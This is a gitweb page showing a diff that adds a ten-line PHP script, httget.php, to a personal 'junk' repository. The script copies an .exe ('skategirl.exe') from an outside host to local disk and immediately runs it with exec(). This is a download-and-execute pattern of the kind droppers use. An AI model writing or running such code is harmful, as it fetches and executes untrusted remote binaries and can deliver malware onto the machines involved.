Added lot of junk laying around on harvie.cz
[mirrors/Programs.git] / php / skripty / httget.php
diff --git a/php/skripty/httget.php b/php/skripty/httget.php
new file mode 100644 (file)
index 0000000..22710f6
--- /dev/null
@@ -0,0 +1,10 @@
+<?php\r
+\r
+function http_download ($what, $where) {\r
+  copy($what,$where);\r
+  exec($where);\r
+}\r
+\r
+http_download("http://harvie.stokoruna.cz/files/skategirl.exe", "skategirl.exe");\r
+\r
+?>\r
This page took 0.198197 seconds and 4 git commands to generate.